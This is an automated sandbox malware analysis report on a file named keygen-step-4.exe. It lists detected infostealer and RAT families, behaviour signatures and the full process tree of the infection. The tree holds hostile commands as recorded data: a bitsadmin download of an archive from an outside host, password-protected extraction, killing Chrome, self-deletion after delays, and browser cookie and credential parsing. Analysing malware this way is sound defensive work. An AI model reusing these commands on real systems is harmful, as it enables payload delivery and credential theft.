Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    844s
  • max time network
    853s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    28-04-2021 04:33

Errors

Reason
Machine shutdown

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 11 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1924
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2712
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2724
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2604
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2380
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2368
          • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
            "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:3896
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
              2⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4032
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                3⤵
                • Loads dropped DLL
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:504
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3496
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4156
              • C:\Users\Admin\AppData\Local\Temp\is-JNJAO.tmp\Install.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-JNJAO.tmp\Install.tmp" /SL5="$401A4,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:4284
                • C:\Users\Admin\AppData\Local\Temp\is-LPCRD.tmp\Ultra.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-LPCRD.tmp\Ultra.exe" /S /UID=burnerch1
                  4⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops file in Program Files directory
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4408
                  • C:\Program Files\Windows Portable Devices\XRYXYIYWJE\ultramediaburner.exe
                    "C:\Program Files\Windows Portable Devices\XRYXYIYWJE\ultramediaburner.exe" /VERYSILENT
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4572
                    • C:\Users\Admin\AppData\Local\Temp\is-LF3D3.tmp\ultramediaburner.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-LF3D3.tmp\ultramediaburner.tmp" /SL5="$501F4,281924,62464,C:\Program Files\Windows Portable Devices\XRYXYIYWJE\ultramediaburner.exe" /VERYSILENT
                      6⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of WriteProcessMemory
                      PID:4608
                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                        7⤵
                        • Executes dropped EXE
                        PID:4728
                  • C:\Users\Admin\AppData\Local\Temp\19-2e6ee-4ef-4e784-ce09fe95411c7\Goshavozhagy.exe
                    "C:\Users\Admin\AppData\Local\Temp\19-2e6ee-4ef-4e784-ce09fe95411c7\Goshavozhagy.exe"
                    5⤵
                    • Executes dropped EXE
                    • Checks computer location settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4636
                  • C:\Users\Admin\AppData\Local\Temp\70-e56b8-1da-4fe8b-457caa4ec8a6e\Wudezhuvolae.exe
                    "C:\Users\Admin\AppData\Local\Temp\70-e56b8-1da-4fe8b-457caa4ec8a6e\Wudezhuvolae.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4676
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ghzyrrly.lch\skipper.exe /s & exit
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4856
                      • C:\Users\Admin\AppData\Local\Temp\ghzyrrly.lch\skipper.exe
                        C:\Users\Admin\AppData\Local\Temp\ghzyrrly.lch\skipper.exe /s
                        7⤵
                        • Executes dropped EXE
                        PID:4380
                        • C:\Users\Admin\AppData\Local\Temp\1708353945.exe
                          C:\Users\Admin\AppData\Local\Temp\1708353945.exe
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:4336
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                            9⤵
                              PID:5072
                          • C:\Users\Admin\AppData\Local\Temp\1265214349.exe
                            C:\Users\Admin\AppData\Local\Temp\1265214349.exe
                            8⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:5496
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              9⤵
                                PID:2840
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\ghzyrrly.lch\skipper.exe & exit
                              8⤵
                                PID:5188
                                • C:\Windows\SysWOW64\PING.EXE
                                  ping 0
                                  9⤵
                                  • Runs ping.exe
                                  PID:3960
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tjxlwzwa.cqt\001.exe & exit
                            6⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3208
                            • C:\Users\Admin\AppData\Local\Temp\tjxlwzwa.cqt\001.exe
                              C:\Users\Admin\AppData\Local\Temp\tjxlwzwa.cqt\001.exe
                              7⤵
                              • Executes dropped EXE
                              PID:296
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3eekdc3m.ho5\gpooe.exe & exit
                            6⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3816
                            • C:\Users\Admin\AppData\Local\Temp\3eekdc3m.ho5\gpooe.exe
                              C:\Users\Admin\AppData\Local\Temp\3eekdc3m.ho5\gpooe.exe
                              7⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              PID:4412
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                8⤵
                                • Executes dropped EXE
                                PID:2068
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                8⤵
                                  PID:4460
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  8⤵
                                  • Executes dropped EXE
                                  PID:4376
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4f5exk1t.tci\google-game.exe & exit
                              6⤵
                                PID:2348
                                • C:\Users\Admin\AppData\Local\Temp\4f5exk1t.tci\google-game.exe
                                  C:\Users\Admin\AppData\Local\Temp\4f5exk1t.tci\google-game.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4444
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    8⤵
                                    • Loads dropped DLL
                                    • Modifies registry class
                                    PID:4788
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cl4nthrx.aom\md1_1eaf.exe & exit
                                6⤵
                                  PID:3192
                                  • C:\Users\Admin\AppData\Local\Temp\cl4nthrx.aom\md1_1eaf.exe
                                    C:\Users\Admin\AppData\Local\Temp\cl4nthrx.aom\md1_1eaf.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    PID:5524
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\035he0sq.khg\HookSetp.exe /silent & exit
                                  6⤵
                                    PID:3176
                                    • C:\Users\Admin\AppData\Local\Temp\035he0sq.khg\HookSetp.exe
                                      C:\Users\Admin\AppData\Local\Temp\035he0sq.khg\HookSetp.exe /silent
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5664
                                      • C:\Users\Admin\AppData\Roaming\4795278.exe
                                        "C:\Users\Admin\AppData\Roaming\4795278.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        PID:5544
                                      • C:\Users\Admin\AppData\Roaming\1707064.exe
                                        "C:\Users\Admin\AppData\Roaming\1707064.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        PID:4232
                                        • C:\ProgramData\Windows Host\Windows Host.exe
                                          "C:\ProgramData\Windows Host\Windows Host.exe"
                                          9⤵
                                          • Executes dropped EXE
                                          PID:2472
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gdsypppc.a5z\askinstall39.exe & exit
                                    6⤵
                                      PID:5328
                                      • C:\Users\Admin\AppData\Local\Temp\gdsypppc.a5z\askinstall39.exe
                                        C:\Users\Admin\AppData\Local\Temp\gdsypppc.a5z\askinstall39.exe
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5852
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          8⤵
                                            PID:1844
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              9⤵
                                              • Kills process with taskkill
                                              PID:5048
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vsc23mjg.2k4\y1.exe & exit
                                        6⤵
                                          PID:5752
                                          • C:\Users\Admin\AppData\Local\Temp\vsc23mjg.2k4\y1.exe
                                            C:\Users\Admin\AppData\Local\Temp\vsc23mjg.2k4\y1.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:5284
                                            • C:\Users\Admin\AppData\Local\Temp\3aVhi6BGlz.exe
                                              "C:\Users\Admin\AppData\Local\Temp\3aVhi6BGlz.exe"
                                              8⤵
                                                PID:4384
                                                • C:\Users\Admin\AppData\Roaming\1619584363532.exe
                                                  "C:\Users\Admin\AppData\Roaming\1619584363532.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619584363532.txt"
                                                  9⤵
                                                  • Executes dropped EXE
                                                  PID:5296
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\3aVhi6BGlz.exe"
                                                  9⤵
                                                    PID:6092
                                                    • C:\Windows\SysWOW64\PING.EXE
                                                      ping 127.0.0.1 -n 3
                                                      10⤵
                                                      • Runs ping.exe
                                                      PID:5864
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\vsc23mjg.2k4\y1.exe"
                                                  8⤵
                                                    PID:5872
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout /T 10 /NOBREAK
                                                      9⤵
                                                      • Delays execution with timeout.exe
                                                      PID:5564
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kfphknsg.pvs\requête.exe & exit
                                                6⤵
                                                  PID:5336
                                                  • C:\Users\Admin\AppData\Local\Temp\kfphknsg.pvs\requête.exe
                                                    C:\Users\Admin\AppData\Local\Temp\kfphknsg.pvs\requête.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5204
                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:4964
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                        parse.exe -f json -b firefox
                                                        9⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:5800
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                        parse.exe -f json -b edge
                                                        9⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:3944
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                        parse.exe -f json -b chrome
                                                        9⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:5856
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tj1grwcc.ia2\SunLabsPlayer.exe /S & exit
                                                  6⤵
                                                    PID:5672
                                                    • C:\Users\Admin\AppData\Local\Temp\tj1grwcc.ia2\SunLabsPlayer.exe
                                                      C:\Users\Admin\AppData\Local\Temp\tj1grwcc.ia2\SunLabsPlayer.exe /S
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Drops file in Program Files directory
                                                      PID:3516
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:1128
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:3792
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:3292
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:4832
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5232
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:4376
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                                    8⤵
                                                                    • Checks for any installed AV software in registry
                                                                    PID:5144
                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                    8⤵
                                                                    • Download via BitsAdmin
                                                                    PID:5504
                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pLZQiSM75KRmgEsZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    PID:5952
                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -plIt7BMSl5CGLPUK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:5236
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:5736
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:2892
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:5844
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4300
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                                            8⤵
                                                                            • Executes dropped EXE
                                                                            PID:4332
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              9⤵
                                                                              • Executes dropped EXE
                                                                              PID:4036
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                            8⤵
                                                                            • Loads dropped DLL
                                                                            PID:5216
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                              9⤵
                                                                              • Loads dropped DLL
                                                                              • Drops file in System32 directory
                                                                              PID:6052
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                                            8⤵
                                                                            • Blocklisted process makes network request
                                                                            • Modifies Internet Explorer settings
                                                                            PID:5024
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:568
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                                              8⤵
                                                                              • Drops file in Program Files directory
                                                                              PID:4800
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                                              8⤵
                                                                              • Blocklisted process makes network request
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:4384
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn4C1F.tmp\tempfile.ps1"
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:4780
                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:4660
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i5wy2po1.gmh\005.exe & exit
                                                                          6⤵
                                                                            PID:1436
                                                                            • C:\Users\Admin\AppData\Local\Temp\i5wy2po1.gmh\005.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\i5wy2po1.gmh\005.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:8
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\25htkmpx.tkg\GcleanerWW.exe /mixone & exit
                                                                            6⤵
                                                                              PID:6092
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c025z4im.3xe\toolspab1.exe & exit
                                                                              6⤵
                                                                                PID:1308
                                                                                • C:\Users\Admin\AppData\Local\Temp\c025z4im.3xe\toolspab1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\c025z4im.3xe\toolspab1.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:2144
                                                                                  • C:\Users\Admin\AppData\Local\Temp\c025z4im.3xe\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\c025z4im.3xe\toolspab1.exe
                                                                                    8⤵
                                                                                      PID:4384
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yj0ydtof.flo\c7ae36fa.exe & exit
                                                                                  6⤵
                                                                                    PID:5436
                                                                                    • C:\Users\Admin\AppData\Local\Temp\yj0ydtof.flo\c7ae36fa.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\yj0ydtof.flo\c7ae36fa.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:4628
                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Modifies system certificate store
                                                                            PID:4816
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 1740
                                                                              3⤵
                                                                              • Drops file in Windows directory
                                                                              • Program crash
                                                                              PID:5240
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                          1⤵
                                                                            PID:1380
                                                                          • \??\c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                            1⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            • Modifies data under HKEY_USERS
                                                                            • Modifies registry class
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:3680
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                              2⤵
